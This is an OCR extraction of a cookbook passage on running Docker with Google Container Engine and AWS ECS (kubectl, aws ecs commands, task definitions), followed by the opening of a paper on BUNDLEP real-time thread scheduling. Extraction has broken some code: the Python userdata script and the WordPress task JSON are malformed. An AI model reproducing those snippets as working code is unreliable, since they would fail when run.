gcr.io/sylvan_plane_862/busybox:latest sebastiengoasguen@cookbook:~$ sudo docker images | grep busybox gcr.io/sylvan_plane_862/busybox latest a9eb17255234 ... ``` Figure 1-8. Google container registry image To be able to push from a GCE instance, you need to start it with the correct scope: `--scopes https://www.googleapis.com/auth/devstorage.read_write`. ## Using Kubernetes in the Cloud via GKE ### Problem You want to use a group of Docker hosts and manage containers on them. You like the Kubernetes container orchestration engine but would like to use it as a hosted cloud service. ### Solution Use the Google Container Engine service (GKE). This new service allows you to create a Kubernetes cluster on-demand using the Google API. A cluster will be composed of a master node and a set of compute nodes that act as container VMs, similar to what was described in “Starting a Docker Host on Google GCE” on page 7. GKE is Generally Available (GA). Kubernetes is still under heavy development but has released a stable API with its 1.0 release. For details on Kubernetes, see chapter 5 of the Docker cookbook. Update your `gcloud` SDK to use the container engine preview. If you have not yet installed the Google SDK, see “Starting a Docker Host on Google GCE” on page 7. ``` $ gcloud components update ``` Install the `kubectl` Kubernetes client: ``` $ gcloud components install kubectl ``` Starting a Kubernetes cluster using the GKE service requires a single command: ``` $ gcloud container clusters create cook \ --num-nodes 1 \ --machine-type g1-small Creating cluster cook...done. Created [https://container.googleapis.com/v1/projects/sylvan-plane-862/zones/ \ us-central1-f/clusters/cook]. kubeconfig entry generated for cook. ``` Your cluster IP addresses, project name, and zone will differ from what is shown here. What you do see is that a Kubernetes configuration file, *kubeconfig*, was generated for you. It is located at `~/.kube/config` and contains the endpoint of your container cluster as well as the credentials to use it. You could also create a cluster through the Google Cloud web console (see Figure 1-9). ![Google Cloud Developers Console](image) *Figure 1-9. Container Engine Wizard* Once your cluster is up, you can submit containers to it—meaning that you can interact with the underlying Kubernetes master node to launch a group of containers on the set of nodes in your cluster. Groups of containers are defined as *pods*. The `gcloud` CLI gives you a convenient way to define simple pods and submit them to the cluster. Next you are going to launch a container using the *tutum/wordpress* image, which contains a MySQL database. When you installed the `gcloud` CLI, it also installed the Kubernetes client `kubectl`. You can verify that `kubectl` is in your path. It will use the configuration that was autogenerated when you created the cluster. This will allow you to launch containers from your local machine on the remote container cluster securely: Once the container is scheduled on one of the cluster nodes, you need to create a Kubernetes service to expose the application running in the container to the outside world. This is done again with kubectl: ```bash $ kubectl expose rc wordpress \ --type=LoadBalancer ``` <table> <thead> <tr> <th>NAME</th> <th>LABELS</th> <th>SELECTOR</th> <th>IP(S)</th> <th>PORT(S)</th> </tr> </thead> <tbody> <tr> <td>wordpress</td> <td>run=wordpress</td> <td>run=wordpress</td> <td>80/TCP</td> <td></td> </tr> </tbody> </table> The `expose` command creates a Kubernetes service (one of the three Kubernetes primitives with pods and replication controllers) and it also obtains a public IP address from a load-balancer. The result is that when you list the services in your container cluster, you can see the `wordpress` service with an internal IP and a public IP where you can access the WordPress UI from your laptop: ```bash $ kubectl get services ``` <table> <thead> <tr> <th>NAME</th> <th>... SELECTOR</th> <th>IP(S)</th> <th>PORT(S)</th> </tr> </thead> <tbody> <tr> <td>wordpress</td> <td>... run=wordpress</td> <td>10.95.252.182</td> <td>80/TCP</td> </tr> <tr> <td></td> <td></td> <td>104.154.82.185</td> <td></td> </tr> </tbody> </table> You will then be able to enjoy WordPress. **Discussion** The `kubectl` CLI can be used to manage all resources in a Kubernetes cluster (i.e., pods, services, replication controllers, nodes). As shown in the following snippet of the `kubectl usage`, you can create, delete, describe, and list all of these resources: ```bash $ kubectl -h ``` `kubectl` controls the Kubernetes cluster manager. Find more information at https://github.com/GoogleCloudPlatform/kubernetes. Usage: - `kubectl [flags]` - `kubectl [command]` Available Commands: - `get` Display one or many resources - `describe` Show details of a specific resource ... create Create a resource by filename or stdin replace Replace a resource by filename or stdin. patch Update field(s) of a resource by stdin. delete Delete a resource by filename, or ... Although you can launch simple pods consisting of a single container, you can also specify a more advanced pod defined in a JSON or YAML file by using the `-f` option: $$\text{kubectl create -f /path/to/pod/pod.json}$$ A pod can be described in YAML. Here let’s write your pod in a JSON file, using the newly released Kubernetes v1 API version. This pod will start Nginx: ``` { "kind": "Pod", "apiVersion": "v1", "metadata": { "name": "nginx", "labels": { "app": "nginx" } }, "spec": { "containers": [ { "name": "nginx", "image": "nginx", "ports": [ { "containerPort": 80, "protocol": "TCP" } ] } ] } } ``` Start the pod and check its status. Once it is running and you have a firewall with port 80 open for the cluster nodes, you will be able to see the Nginx welcome page. Additional examples are available on the Kubernetes GitHub page. $$\text{kubectl create -f nginx.json} \text{pods/nginx} \text{kubectl get pods}$$ <table> <thead> <tr> <th>NAME</th> <th>READY</th> <th>STATUS</th> <th>RESTARTS</th> <th>AGE</th> </tr> </thead> </table> Using Kubernetes in the Cloud via GKE | 29 To clean things up, remove your pods, exit the master node, and delete your cluster: ```bash $ kubectl delete pods nginx $ kubectl delete pods wordpress $ gcloud container clusters delete cook ``` ### See Also - Cluster operations - Pod operations - Service operations - Replication controller operations ### Setting Up to Use the EC2 Container Service #### Problem You want to try the new Amazon AWS EC2 container service (ECS). #### Solution ECS is a generally available service of Amazon Web Services. Getting set up to test ECS involves several steps. This recipe summarizes the main steps, but you should refer to the official documentation for all details: 1. **Sign up** for AWS if you have not done so. 2. Log in to the AWS console. Review “Starting a Docker Host on AWS EC2” on page 3 if needed. You will launch ECS instances within a security group associated with a VPC. Create a VPC and a security group, or ensure that you have default ones present. 3. Go to the IAM console and create a role for ECS. If you are not familiar with IAM, this step is a bit advanced and can be followed step by step on the AWS documentation for ECS. 4. For the role that you just created, create an inline policy. If successful, when you select the Show Policy link, you should see Figure 1-10. See the discussion section of this recipe for an automated way of creating this policy using Boto. Figure 1-10. ECS policy in IAM role console 5. Install the latest AWS CLI. The ECS API is available in version 1.7.0 or greater. You can verify that the `aws ecs` commands are now available: $ sudo pip install awscli $ aws --version aws-cli/1.7.8 Python/2.7.9 Darwin/12.6.0 $ aws ecs help ECS( NAME ecs - DESCRIPTION Amazon EC2 Container Service (Amazon ECS) is a highly scalable, fast, container management service that makes it easy to run, stop, and manage Docker containers on a cluster of Amazon EC2 instances. Amazon ECS lets you launch and stop container-enabled applications with simple API calls, allows you to get the state of your cluster from a centralized service, and gives you access to many familiar Amazon EC2 features like security groups, Amazon EBS volumes, and IAM roles. 6. Create an AWS CLI configuration file that contains the API keys of the IAM user you created. Note the region being set is us-east-1, which is the Northern Virginia region where ECS is currently available: ``` $ cat ~/.aws/config [default] output = table region = us-east-1 aws_access_key_id = <your AWS access key> aws_secret_access_key = <your AWS secret key> ``` Once you have completed all these steps, you are ready to use ECS. You need to create a cluster (see “Creating an ECS Cluster” on page 33), define tasks corresponding to containers, and run those tasks to start the containers on the cluster (see “Starting Docker Containers on an ECS Cluster” on page 37). **Discussion** Creating the IAM profile and the ECS policy for the instances that will be started to form the cluster can be overwhelming if you have not used AWS before. To facilitate this step, you can use the online code accompanying this book, which uses the Python Boto client to create the policy. Install Boto, copy .aws/config to .aws/credentials, clone the repository, and execute the script: ``` $ git clone https://github.com/how2dock/docbook.git $ sudo pip install boto $ cp ~/.aws/config ~/.aws/credentials $ cd docbook/ch08/ecs $ ./ecs-policy.py ``` This script creates an ecs role, an ecspolicy policy, and a cookbook instance profile. You can edit the script to change these names. After completion, you should see the role and the policy in the IAM console. **See Also** - Video of an ECS demo Creating an ECS Cluster Problem You are set up to use ECS (see “Setting Up to Use the EC2 Container Service” on page 30). Now you want to create a cluster and some instances in it to run containers. Solution Use the AWS CLI that you installed in “Setting Up to Use the EC2 Container Service” on page 30 and explore the new ECS API. In this recipe, you will learn to use the following: - `aws ecs list-clusters` - `aws ecs create-cluster` - `aws ecs describe-clusters` - `aws ecs list-container-instances` - `aws ecs delete-cluster` By default, you have one cluster in ECS, but until you have launched an instance in that cluster, it is not active. Try to describe the default cluster: ``` $ aws ecs describe-clusters ``` Currently you are limited to two ECS clusters. To activate this cluster, launch an instance using Boto. The AMI used is specific to ECS and contains the ECS agent. You need to have created an SSH key pair to ssh into the instance, and you need an instance profile associated with a role that has the ECS policy (see “Setting Up to Use the EC2 Container Service” on page 30): ``` $ python ... >>> import boto >>> c = boto.connect_ec2() >>> c.run_instances('ami-34ddbe5c', key_name='ecs', instance_type='t2.micro', instance_profile_name='cookbook') ``` With one instance started, wait for it to run and register in the cluster. Then if you describe the cluster again, you will see that the default cluster has switched to active state. You can also list container instances: ``` $ aws ecs describe-clusters ------------------------------- <table> <thead> <tr> <th>DescribeClusters</th> </tr> </thead> </table> +-----------------------------+--- <table> <thead> <tr> <th>clusters</th> </tr> </thead> <tbody> <tr> <td>activeServicesCount</td> </tr> <tr> <td>clusterArn</td> </tr> <tr> <td>clusterName</td> </tr> <tr> <td>pendingTasksCount</td> </tr> <tr> <td>registeredContainer...</td> </tr> <tr> <td>runningTasksCount</td> </tr> <tr> <td>status</td> </tr> </tbody> </table> +-----------------------------+--- ``` ``` $ aws ecs list-container-instances ------------------------------------- <table> <thead> <tr> <th>ListContainerInstances</th> </tr> </thead> <tbody> <tr> <td>containerInstanceArns</td> </tr> <tr> <td>-----------------------------------</td> </tr> <tr> <td>arn:aws:ecs:us-east-1::container...</td> </tr> <tr> <td>-----------------------------------</td> </tr> </tbody> </table> ``` Starting additional instances increases the size of the cluster: ``` $ aws ecs list-container-instances ------------------------------------- <table> <thead> <tr> <th>ListContainerInstances</th> </tr> </thead> <tbody> <tr> <td>containerInstanceArns</td> </tr> <tr> <td>-----------------------------------</td> </tr> </tbody> </table> ``` 34 | Docker in the Cloud Since these container instances are regular EC2 instances, you will see them in your EC2 console. If you have set up an SSH key properly and opened port 22 on the security group used, you can also ssh to them: ``` $ ssh -i ~/.ssh/id_rsa_ecs ec2-user@52.1.224.245 ... _\______\_ Amazon ECS-Optimized Amazon Linux AMI \_\_\_\_\_\_ ``` Image created: Thu Dec 18 01:39:14 UTC 2014 PREVIEW AMI 9 package(s) needed for security, out of 10 available Run "sudo yum update" to apply all updates. ``` [ec2-user@ip-172-31-33-78 ~]$ docker ps CONTAINER ID IMAGE ... 4bc4d480a362 amazon/amazon-ecs-agent:latest ... ``` ``` [ec2-user@ip-10-0-0-92 ~]$ docker version Client version: 1.7.1 Client API version: 1.19 Go version (client): go1.4.2 Git commit (client): 786b29d/1.7.1 OS/Arch (client): linux/amd64 Server version: 1.7.1 Server API version: 1.19 Go version (server): go1.4.2 Git commit (server): 786b29d/1.7.1 OS/Arch (server): linux/amd64 ``` You see that the container instance is running Docker and that the ECS agent is a container. The Docker version that you see will most likely be different, as Docker releases a new version approximately every two months. Discussion Although you can use the default cluster, you can also create your own: ```bash $ aws ecs create-cluster --cluster-name cookbook ------------------------------------------------------ | CreateCluster | |+------------------------------------------------------+ || cluster || |+-------------------------------+-------------+----------+ || clusterArn | clusterName | status | |+-------------------------------+-------------+----------+ || arn:aws:...:cluster/cookbook | cookbook | ACTIVE | |+-------------------------------+-------------+----------+ $ aws ecs list-clusters ----------------------------------------------------------- | ListClusters | |+-------------------------------------------------------+ || clusterArns || |+-------------------------------------------------------+ || arn:aws:ecs:us-east-1:587264368683:cluster/cookbook || || arn:aws:ecs:us-east-1:587264368683:cluster/default || |+-------------------------------------------------------+ ``` To launch instances in that freshly created cluster instead of the default one, you need to pass some user data during the instance creation step. Via Boto, this can be achieved with the following script: ```python #!/usr/bin/env python import boto import base64 userdata="" #!/bin/bash echo ECS_CLUSTER=cookbook >> /etc/ecs/ecs.config " c = boto.connect_ec2() c.run_instances('ami-34ddbe5c', key_name='ecs', instance_type='t2.micro', instance_profile_name='cookbook', user_data=base64.b64encode(userdata)) ``` Once you are done with the cluster, you can delete it entirely with the `aws ecs delete-cluster --cluster cookbook` command. Starting Docker Containers on an ECS Cluster Problem You know how to create an ECS cluster on AWS (see “Creating an ECS Cluster” on page 33), and now you are ready to start containers on the instances forming the cluster. Solution Define your containers or group of containers in a definition file in JSON format. This will be called a task. You will register this task and then run it; it is a two-step process. Once the task is running in the cluster, you can list, stop, and start it. For example, to run Nginx in a container based on the nginx image from Docker Hub, you create the following task definition in JSON format: ```json [ { "environment": [], "name": "nginx", "image": "nginx", "cpu": 10, "portMappings": [ { "containerPort": 80, "hostPort": 80 } ], "memory": 10, "essential": true } ] ``` You can notice the similarities between this task definition, a Kubernetes Pod and a Docker compose file. To register this task, use the ECS register-task-definition call. Specify a family that groups the tasks and helps you keep revision history, which can be handy for rollback purposes: To start the container in this task definition, you use the `run-task` command and specify the number of containers you want running. To stop the container, you stop the task specifying it via its task UUID obtained from `list-tasks`, as shown here: ```bash $ aws ecs run-task --task-definition nginx:1 --count 1 $ aws ecs stop-task --task 6223f2d3-3689-4b3b-a110-ea128350adb2 ``` ECS schedules the task on one of the container instances in your cluster. The image is pulled from Docker Hub, and the container started using the options specified in the task definition. At this preview stage of ECS, finding the instance where the task is running and finding the associated IP address isn’t straightforward. If you have multiple instances running, you will have to do a bit of guesswork. There does not seem to be a proxy service as in Kubernetes either. **Discussion** The Nginx example represents a task with a single container running, but you can also define a task with linked containers. The task definition reference describes all possible keys that can be used to define a task. To continue with our example of running WordPress with two containers (a `wordpress` one and a `mysql` one), you can define a `wordpress` task. It is similar to a Compose definition file to AWS ECS task definition format. It will not go unnoticed that a standardization effort among `compose`, `pod`, and `task` would benefit the community. ```json [ { "image": "wordpress", "name": "wordpress", "cpu": 10, "memory": 200, ``` "essential": true, "links": [ "mysql" ], "portMappings": [ { "containerPort": 80, "hostPort": 80 } ], "environment": [ { "name": "WORDPRESS_DB_NAME", "value": "wordpress" }, { "name": "WORDPRESS_DB_USER", "value": "wordpress" }, { "name": "WORDPRESS_DB_PASSWORD", "value": "wordpresspwd" } ], "image": "mysql", "name": "mysql", "cpu": 10, "memory": 200, "essential": true, "environment": [ { "name": "MYSQL_ROOT_PASSWORD", "value": "wordpressdocker" }, { "name": "MYSQL_DATABASE", "value": "wordpress" }, { "name": "MYSQL_USER", "value": "wordpress" }, { "name": "MYSQL_PASSWORD", "value": "wordpresspwd" } ] The task is registered the same way as done previously with Nginx, but you specify a new family. But when the task is run, it could fail due to constraints not being met. In this example, my container instances are of type t2.micro with 1GB of memory. Since the task definition is asking for 500 MB for wordpress and 500 MB for mysql, there’s not enough memory for the cluster scheduler to find an instance that matches the constraints and running the task fails: ```bash $ aws ecs register-task-definition --family wordpress \ --cli-input-json file://$PWD/wordpress.json $ aws ecs run-task --task-definition wordpress:1 --count 1 ``` ``` +-------------------------------+----------------+ | failures | +-------------------------------+----------------+ | arn | +-------------------------------+----------------+ | arn:aws:ecs::container-instance/... | RESOURCE:MEMORY | | arn:aws:ecs::container-instance/... | RESOURCE:MEMORY | | arn:aws:ecs::container-instance/... | RESOURCE:MEMORY | ``` You can edit the task definition, relax the memory constraint, and register a new task in the same family (revision 2). It will successfully run. If you log into the instance running this task, you will see the containers running alongside the ECS agent: ```bash $ ssh -i ~/.ssh/id_rsa_ecs ec2-user@54.152.108.134 ... ...[ec2-user@ip-172-31-36-83 ~]$ docker ps CONTAINER ID IMAGE ... NAMES 36d590a206df wordpress:4 ... ecs-wordpress... 893d1bd24421 mysql:5 ... ecs-wordpress... 81023576f81e amazon/amazon-ecs ... ecs-agent ``` Enjoy ECS and keep an eye on improvements and general availability. See Also - Task definition reference
{"Source-Url": "https://www.oreilly.com/webops-perf/free/files/docker-in-the-cloud.pdf", "len_cl100k_base": 13987, "olmocr-version": "0.1.50", "pdf-total-pages": 49, "total-fallback-pages": 0, "total-input-tokens": 78892, "total-output-tokens": 16407, "length": "2e13", "weborganizer": {"__label__adult": 0.00029158592224121094, "__label__art_design": 0.000995635986328125, "__label__crime_law": 0.0002562999725341797, "__label__education_jobs": 0.00263214111328125, "__label__entertainment": 0.0001832246780395508, "__label__fashion_beauty": 0.00015544891357421875, "__label__finance_business": 0.001445770263671875, "__label__food_dining": 0.0003037452697753906, "__label__games": 0.0008020401000976562, "__label__hardware": 0.0015916824340820312, "__label__health": 0.00030303001403808594, "__label__history": 0.0004124641418457031, "__label__home_hobbies": 0.00023317337036132812, "__label__industrial": 0.0005002021789550781, "__label__literature": 0.0004055500030517578, "__label__politics": 0.0002213716506958008, "__label__religion": 0.0003409385681152344, "__label__science_tech": 0.0943603515625, "__label__social_life": 0.00020623207092285156, "__label__software": 0.1279296875, "__label__software_dev": 0.765625, "__label__sports_fitness": 0.00016772747039794922, "__label__transportation": 0.0003817081451416016, "__label__travel": 0.00024247169494628904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 56768, 0.02143]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 56768, 0.0763]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 56768, 0.79304]], "google_gemma-3-12b-it_contains_pii": [[0, 81, false], [81, 81, null], [81, 656, null], [656, 656, null], [656, 656, null], [656, 656, null], [656, 1954, null], [1954, 1954, null], [1954, 3043, null], [3043, 4856, null], [4856, 6652, null], [6652, 8045, null], [8045, 9578, null], [9578, 11048, null], [11048, 12751, null], [12751, 14486, null], [14486, 15927, null], [15927, 17461, null], [17461, 18400, null], [18400, 19933, null], [19933, 20880, null], [20880, 22164, null], [22164, 23268, null], [23268, 24856, null], [24856, 26403, null], [26403, 26702, null], [26702, 28367, null], [28367, 29407, null], [29407, 30922, null], [30922, 32081, null], [32081, 33357, null], [33357, 34887, null], [34887, 36131, null], [36131, 37685, null], [37685, 38936, null], [38936, 40713, null], [40713, 42116, null], [42116, 43401, null], [43401, 44225, null], [44225, 45831, null], [45831, 46607, null], [46607, 48589, null], [48589, 49795, null], [49795, 51634, null], [51634, 52801, null], [52801, 54337, null], [54337, 55044, null], [55044, 56731, null], [56731, 56768, null]], "google_gemma-3-12b-it_is_public_document": [[0, 81, true], [81, 81, null], [81, 656, null], [656, 656, null], [656, 656, null], [656, 656, null], [656, 1954, null], [1954, 1954, null], [1954, 3043, null], [3043, 4856, null], [4856, 6652, null], [6652, 8045, null], [8045, 9578, null], [9578, 11048, null], [11048, 12751, null], [12751, 14486, null], [14486, 15927, null], [15927, 17461, null], [17461, 18400, null], [18400, 19933, null], [19933, 20880, null], [20880, 22164, null], [22164, 23268, null], [23268, 24856, null], [24856, 26403, null], [26403, 26702, null], [26702, 28367, null], [28367, 29407, null], [29407, 30922, null], [30922, 32081, null], [32081, 33357, null], [33357, 34887, null], [34887, 36131, null], [36131, 37685, null], [37685, 38936, null], [38936, 40713, null], [40713, 42116, null], [42116, 43401, null], [43401, 44225, null], [44225, 45831, null], [45831, 46607, null], [46607, 48589, null], [48589, 49795, null], [49795, 51634, null], [51634, 52801, null], [52801, 54337, null], [54337, 55044, null], [55044, 56731, null], [56731, 56768, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 56768, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 56768, null]], "pdf_page_numbers": [[0, 81, 1], [81, 81, 2], [81, 656, 3], [656, 656, 4], [656, 656, 5], [656, 656, 6], [656, 1954, 7], [1954, 1954, 8], [1954, 3043, 9], [3043, 4856, 10], [4856, 6652, 11], [6652, 8045, 12], [8045, 9578, 13], [9578, 11048, 14], [11048, 12751, 15], [12751, 14486, 16], [14486, 15927, 17], [15927, 17461, 18], [17461, 18400, 19], [18400, 19933, 20], [19933, 20880, 21], [20880, 22164, 22], [22164, 23268, 23], [23268, 24856, 24], [24856, 26403, 25], [26403, 26702, 26], [26702, 28367, 27], [28367, 29407, 28], [29407, 30922, 29], [30922, 32081, 30], [32081, 33357, 31], [33357, 34887, 32], [34887, 36131, 33], [36131, 37685, 34], [37685, 38936, 35], [38936, 40713, 36], [40713, 42116, 37], [42116, 43401, 38], [43401, 44225, 39], [44225, 45831, 40], [45831, 46607, 41], [46607, 48589, 42], [48589, 49795, 43], [49795, 51634, 44], [51634, 52801, 45], [52801, 54337, 46], [54337, 55044, 47], [55044, 56731, 48], [56731, 56768, 49]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 56768, 0.06827]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
d7622984c4f19df3f8fd0b111f8ce13f9066a1fc
[REMOVED]
{"Source-Url": "http://people.inf.ethz.ch/summersa/wiki/lib/exe/fetch.php?media=papers:fractional.pdf", "len_cl100k_base": 8450, "olmocr-version": "0.1.50", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 21967, "total-output-tokens": 9642, "length": "2e13", "weborganizer": {"__label__adult": 0.0003635883331298828, "__label__art_design": 0.00027370452880859375, "__label__crime_law": 0.0003826618194580078, "__label__education_jobs": 0.0004508495330810547, "__label__entertainment": 5.3822994232177734e-05, "__label__fashion_beauty": 0.0001437664031982422, "__label__finance_business": 0.0001857280731201172, "__label__food_dining": 0.0003376007080078125, "__label__games": 0.00047707557678222656, "__label__hardware": 0.0006060600280761719, "__label__health": 0.0005040168762207031, "__label__history": 0.0001932382583618164, "__label__home_hobbies": 8.183717727661133e-05, "__label__industrial": 0.0003650188446044922, "__label__literature": 0.00027942657470703125, "__label__politics": 0.0002846717834472656, "__label__religion": 0.0004673004150390625, "__label__science_tech": 0.012420654296875, "__label__social_life": 8.392333984375e-05, "__label__software": 0.003877639770507813, "__label__software_dev": 0.97705078125, "__label__sports_fitness": 0.0003292560577392578, "__label__transportation": 0.0005540847778320312, "__label__travel": 0.00019729137420654297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40808, 0.01352]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40808, 0.68409]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40808, 0.89141]], "google_gemma-3-12b-it_contains_pii": [[0, 7384, false], [7384, 13938, null], [13938, 21040, null], [21040, 28285, null], [28285, 34380, null], [34380, 40808, null]], "google_gemma-3-12b-it_is_public_document": [[0, 7384, true], [7384, 13938, null], [13938, 21040, null], [21040, 28285, null], [28285, 34380, null], [34380, 40808, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40808, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40808, null]], "pdf_page_numbers": [[0, 7384, 1], [7384, 13938, 2], [13938, 21040, 3], [21040, 28285, 4], [28285, 34380, 5], [34380, 40808, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40808, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
f13f01f6360d341cd6e3f2cf7a03d89af6609f81
BUNDLEP: Prioritizing Conflict Free Regions in Multi-Threaded Programs to Improve Cache Reuse Corey Tessler Wayne State University corey.tessler@wayne.edu Nathan Fisher Wayne State University fishern@wayne.edu Abstract—In "BUNDLE: Real-Time Multi-Threaded Scheduling to Reduce Cache Contention", Tessler and Fisher propose a scheduling mechanism and combined worst-case execution time calculation method that treats the instruction cache as a beneficial resource shared between threads. Object analysis produces a worst-case execution time bound and separates code segments into regions. Threads are dynamically placed in bundles associated with regions at run time by the BUNDLE scheduling algorithm where they benefit from shared cache values. In the evaluation of the previous work, tasks were created with a predetermined worst-case execution time path through the control flow graph. Apriori knowledge of the worst-case path is impractical restriction on any analysis. At the time, the only other solution available was an all-paths search of the graph, which is an equally impractical approach due to its complexity. The primary focus of this work is to build upon BUNDLE, expanding its applicability beyond a proof of concept. We present a complete worst-case execution time calculation method that includes thread level context switch costs, operating on real programs, with representative architecture parameters, and compare our results to those produced by Heptane’s state of the art method. To these ends, we propose a modification to the BUNDLE scheduling algorithm called BUNDLEP. Bundles are assigned priorities that enforce an ordered flow of threads through the control flow graph – avoiding the need for multiple all-paths searches through the graph. In many cases, our evaluation shows a run-time and analytical benefit for BUNDLEP compared to serialized thread execution and state of the art WCET analysis. I. INTRODUCTION For hard real-time systems, cache memory complicates the calculation of a task's worst-case execution time (WCET) bound [1]–[4]. An architecture that includes an instruction cache creates the possibility of (at least) two execution times for every instruction. Executing an instruction from the cache, a cache hit, typically takes less time than an instruction that must fetched from main memory (a cache miss). For hierarchical caches, the multiple loading times from one level to another increases the diversity of execution times per instruction. Previous work preceding BUNDLE [5] accounts for variations in these execution times due to tasks sharing a single cache by extending execution times of the preempted or preempting task [2], [6]–[8]. BUNDLE moves away from the classical (negative) perspective of caches, by treating the cache as a benefit to multi-threaded hard real-time tasks. It is comprised of two parts, a worst-case execution time with cache overhead (WCETO) analysis and scheduling algorithm. The analysis leverages BUNDLE’s thread-level scheduling algorithm in calculating a bound which includes the cache benefit between threads. In addition, the analysis identifies conflict free regions used to make scheduling decisions. As a first work, the evaluation in BUNDLE [5] served as a proof of concept, demonstrating the potential benefit in WCETO and run-time savings. For WCETO calculations, it described an all-paths walk with complexity $O((|V|!)^m)$ for $V$ conflict free regions, and $m$ threads. The evaluation subverted this bound by construction of synthetic programs with a known set of worst-case execution paths. Synthetic tasks, all-paths walks, and prior knowledge of their worst-case paths are barriers to BUNDLE’s practical application and acceptance. The primary goal of this work is to provide a suitable WCETO calculation method and run-time evaluation for BUNDLE scheduling that can be compared to the classical approach. The following contributions are made to reach these goals: - A method for calculating conflict free regions (CFRs) where instructions participate in exactly one CFR. - A BUNDLE-based scheduling algorithm that prioritizes conflict free regions named BUNDLEP. - A suitable WCETO calculation method for BUNDLEP which incorporates context switch costs. - A complete evaluation and simulation environment based on the Heptane1 package available for download [9]. The remainder of this work is structured as follows. Section II sets BUNDLE and BUNDLEP in context of the related work. Section III summarizes the core concepts of BUNDLE and background required for the extensions. Section IV gives a brief overview of BUNDLE’s approach in contrast to BUNDLE. Section V outlines the creation of conflict free regions. Section VI is divided into three subsections, describing the thread bottlenecks, priority assignment, and the BUNDLEP scheduling algorithm. Section VII details the WCETO method for BUNDLEP. Section VIII describes the evaluation method as a compliment to Heptane and results. Our work concludes with final remarks and potential extensions in Section IX. II. RELATED WORK Other efforts have been made to mitigate or manage the cache impact of concurrent tasks. Memory-Centric Schedul- 1See https://team.imria.fr/alf/software/heptane ing [10] is influenced by the cache impact of each task. However, it only supports PREM-compliant [11] tasks that have been divided into load and execution phases. Loading phases are isolated from one another preventing an inter-thread cache benefit between them. Another approach to predictable cache behavior is taken by [12], using management techniques such as cache coloring and blocking. Cache reuse is increased for a single task, but the method does not accommodate cached values being shared between distinct threads or tasks. These are representative examples of the classical (negative) perspective of caches, in contrast to BUNDLE’s positive view. Aside from BUNDLE, the only works we are currently aware of taking a positive perspective on caches with respect to schedulability are related to Persistent Cache Blocks (PCBS) [13], [14] or cache spread [15]. PCBs are cache blocks that remain in the cache after a job completes to be reused with the next release. However, PCBs are limited to a single task (or thread), and the analytical benefits is limited to subsequent jobs. Calandrino’s [15] examination of cache spread is limited to empirical analysis with a more coarse grained approach than BUNDLE. III. SUMMARY OF BUNDLE The motivation for BUNDLE stems from a positive perspective of caches in the setting of multi-threaded tasks on a shared processor. From this perspective, there is an inter-thread cache benefit when a thread encounters an unexpected cache hit due to the previous execution of a thread from the same task. Other concurrent approaches [16], [17] do not account for the benefit in their analysis due to their focus on finding the worst-case cache interleavings. Conversely, BUNDLE schedules threads to avoid the worst-case and creates a quantifiable benefit of cache reuse between threads. The sporadic model [18] is extended to support BUNDLE’s thread-level scheduling algorithm and analysis. Each task \( \tau_i \) in the set of tasks \( \tau \) is represented by a tuple of minimum inter-arrival time, relative deadline, and initial ribbon: \( \tau_i = (p_i, d_i, R_i) \). A ribbon is the set of reachable instructions from a single entry instruction, described by a conflict free region graph \( R_i \). The initial ribbon of a task is a starting point for the first threads of execution released with each job. Due to the complexity of intra-task scheduling, BUNDLE’s scheduling algorithm and analysis is limited to one processor, a single task\(^2\), with one ribbon, releasing \( m \) threads per job. Execution on the shared processor is aided by a single level direct-mapped cache with \( l \) lines. Loading a block from main memory to the cache takes \( \mathbb{B} \) cycles, with a uniform number of clock cycles per instruction (CPI) denoted \( \mathbb{B} \). This paper is the first, implementation-based step towards our larger goal of bringing BUNDLE to a fully preemptive system-wide scheduler, with multiple tasks, hierarchical caches, on many cores. To quantify the inter-thread cache benefit, BUNDLE schedules threads in a manner cognizant of the program’s structure as well as 